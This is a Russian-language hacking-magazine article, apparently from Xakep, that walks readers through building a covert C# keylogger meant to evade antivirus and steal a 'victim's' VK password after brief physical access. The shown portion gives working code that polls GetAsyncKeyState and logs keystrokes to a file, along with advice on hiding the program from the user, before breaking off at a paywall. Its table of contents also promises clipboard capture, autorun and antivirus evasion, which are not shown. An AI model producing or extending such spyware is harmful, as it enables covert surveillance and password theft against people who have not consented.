Следующая новость
Предыдущая новость

Кейлоггер по-домашнему. Пишем на C# кейлоггер, который не палится антивирусами

15.03.2019 16:45
Кейлоггер по-домашнему. Пишем на C# кейлоггер, который не палится антивирусами

Содержание статьи

  • Ставим задачу
  • Теория
  • Пишем код
  • Красивый вариант
  • Клиппер
  • Собираем логи
  • Автозапуск
  • Реакция антивирусов
  • Проверяем заголовок окна
  • Ищем по логу
  • Итоги

Боевые кейлоггеры с кучей функций и защитой от детекта могут стоить десятки, если не сотни долларов. Но кейлоггер не такая уж сложная штука, и при желании ты можешь сделать собственный и даже избежать детекта антивирусами. В этой статье я покажу, как это делается, а заодно поупражняемся в разработке программ на C#.

Ставим задачу

Мудрить не будем и ограничимся необходимым минимумом. Предположим, мы хотим заполучить пароль жертвы от ВК и мы можем ненадолго получить физический доступ к компьютеру. При этом:

  • мы не беспокоим жертву лишними окнами, иконками в таскбаре, сообщениями об ошибках и подобным;
  • мы имеем доступ к целевому компьютеру только однократно и на очень короткий срок;
  • мы сможем забирать логи, находясь в той же локальной сети;
  • антивирус должен молчать;
  • файрвол не учитываем и предполагаем, что мы дадим ему разрешение вручную при подсадке кейлоггера;
  • мы не будем пытаться скрывать процесс и только дадим ему неприметное название.

Еще жертва может пользоваться парольным менеджером, тогда в логе мы получим только Ctrl-C и Ctrl-V. На этот случай будем мониторить еще и содержимое буфера обмена.

INFO

Подробнее об атаках на парольные менеджеры читай в статье «Ищем слабые места современных менеджеров паролей».

Писать будем на C# в Visual Studio. Забегая вперед, скажу, что в результате у меня получилось две версии программы — одна работает через перехват WinAPI, другую я про себя называю «костыльной». Но эта менее красивая версия дает другие результаты при проверке антивирусами, поэтому расскажу и о ней.

Теория

Когда ты нажимаешь на кнопку, операционка посылает уведомления тем программам, которые хотят об этом узнать. Поэтому самый простой способ перехватить ввод с клавиатуры — это принимать сообщения о нажатиях клавиш. Если мы этого сделать не можем (например, функция SetWindowsHookEx запрещена антивирусом или еще чем-либо), можно тянуть сырой ввод и без нее. Есть такая функция — GetAsyncKeyState, которая принимает номер клавиши и позволяет узнать, зажата она или отжата в момент вызова. Собственно, алгоритм действий будет такой: раз в N мс опрашиваем все кнопки и узнаем их состояние, занося нажатые в специальный список. Затем список обрабатываем, учитывая состояние клавиши Caps Lock, Num Lock, Shift, Ctrl и так далее. Полученные данные будем записывать в файл.

Пишем код

Для начала откроем Visual Studio и создадим новый проект Windows Forms (.NET Framework). Почему именно Windows Forms? Если мы выберем обычное консольное приложение, то при каждом запуске будет создаваться некрасивое черное окошко, а ведь юзера мы договорились не беспокоить. Также, пока мы не создали форму (а создавать ее мы и не будем), никаких значков в таскбаре не появится — важная часть скрытой работы. Теперь удаляй автоматически созданный файл Form1.cs со всеми потрохами и открывай Program.cs.

Кейлоггер по-домашнему. Пишем на C# кейлоггер, который не палится антивирусами
Заглушка Main

Здесь нас уже поджидает шаблон программы, но он не будет работать просто так. Первым делом надо убрать строчки 10–12 и 16–18. Теперь меняем объявление метода со static void Main() на static void Main(String[] args). Нужно это для того, чтобы мы могли определить свои аргументы при перезапуске.

Теперь добавим using System.IO; для работы с файлами, System.Runtime.InteropServices для работы с WinAPI и System.Threading для приостановки потока. Если ты не хочешь писать костыльный вариант, лучше пропусти этот раздел и сразу переходи к следующему.

Импортируем GetAsyncKeyState из user32.dll:

[DllImport("user32.dll")] public static extern int GetAsyncKeyState(Int32 i); 

И добавляем собственно логирование нажатий, собирая их по десять штук, чтобы не делать слишком много дисковых операций:

while (true) {    Thread.Sleep(100);    for (int i = 0; i < 255; i++)    {       int state = GetAsyncKeyState(i);       if (state != 0)       {         buf += ((Keys)i).ToString();          if (buf.Length > 10)          {            File.AppendAllText("keylogger.log", buf);             buf = "";          }       }    } } 
Кейлоггер по-домашнему. Пишем на C# кейлоггер, который не палится антивирусами
Расшифровывать такой лог будет неудобно

Выглядит не очень красиво, а про читабельность вообще можно забыть. Во-первых, наш код тянет ввод не только с клавиатуры, но и с мыши (всякие LButton и RButton). Поэтому давай не будем записывать нажатие, если это не символьная клавиша. Заменим содержимое if в цикле на это:

// Усовершенствованная проверка введенных символов // if (((Keys)i) == Keys.Space) { buf += " "; continue; } if (((Keys)i) == Keys.Enter) { buf += "rn"; continue; } if (((Keys)i) == Keys.LButton ||((Keys)i) == Keys.RButton ||((Keys)i) == Keys.MButton) continue; if (((Keys)i).ToString().Length == 1) {      buf += ((Keys)i).ToString(); } else {      buf += $"<{((Keys)i).ToString()}>"; } if (buf.Length > 10) {     File.AppendAllText("keylogger.log", buf);      buf = ""; } 

После такого редактирования лог стал намного чище (см. рисунок).

Продолжение доступно только подписчикам

Материалы из последних выпусков можно покупать отдельно только через два месяца после публикации. Чтобы продолжить чтение, необходимо купить подписку.

Подпишись на «Хакер» по выгодной цене!

Подписка позволит тебе в течение указанного срока читать ВСЕ платные материалы сайта. Мы принимаем оплату банковскими картами, электронными деньгами и переводами со счетов мобильных операторов. Подробнее о подписке

1 год

7390 р.

Экономия 1400 рублей!

1 месяц

720 р.

25-30 статей в месяц

Уже подписан?

Источник

Последние новости